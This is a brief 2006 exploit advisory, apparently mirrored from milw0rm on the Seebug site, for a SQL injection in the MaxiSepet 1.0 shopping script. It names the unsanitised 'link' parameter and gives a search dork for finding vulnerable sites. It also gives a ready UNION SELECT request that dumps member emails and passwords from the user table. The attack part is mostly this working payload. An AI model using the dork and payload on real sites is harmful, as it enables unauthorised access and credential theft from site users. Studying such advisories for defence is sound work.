#Method found by nukedx #Contacts > ICQ: 10072 MSN/Main: nukedx@nukedx.com web: www.nukedx.com #Original advisory: http://www.nukedx.com/?viewdoc=42 #Title: MaxiSepet <= 1.0 (link) SQL Injection Vulnerability. #Dork: "Copyright MaxiSepet ©" #How: Parameter link did not sanitized properly. #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=SQL #Example: GET -> http://www.victim.com/maxisepetdirectory/default.asp?git=11&link=-1+UNION+SELECT+concat('Üye%20adi:%20<b>',email,'</b><br>','Þifre:%20<b>',sifre,'</b>')+from+uye+ORDER BY email ASC # nukedx.com [2006-06-11] # milw0rm.com [2006-06-11]
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论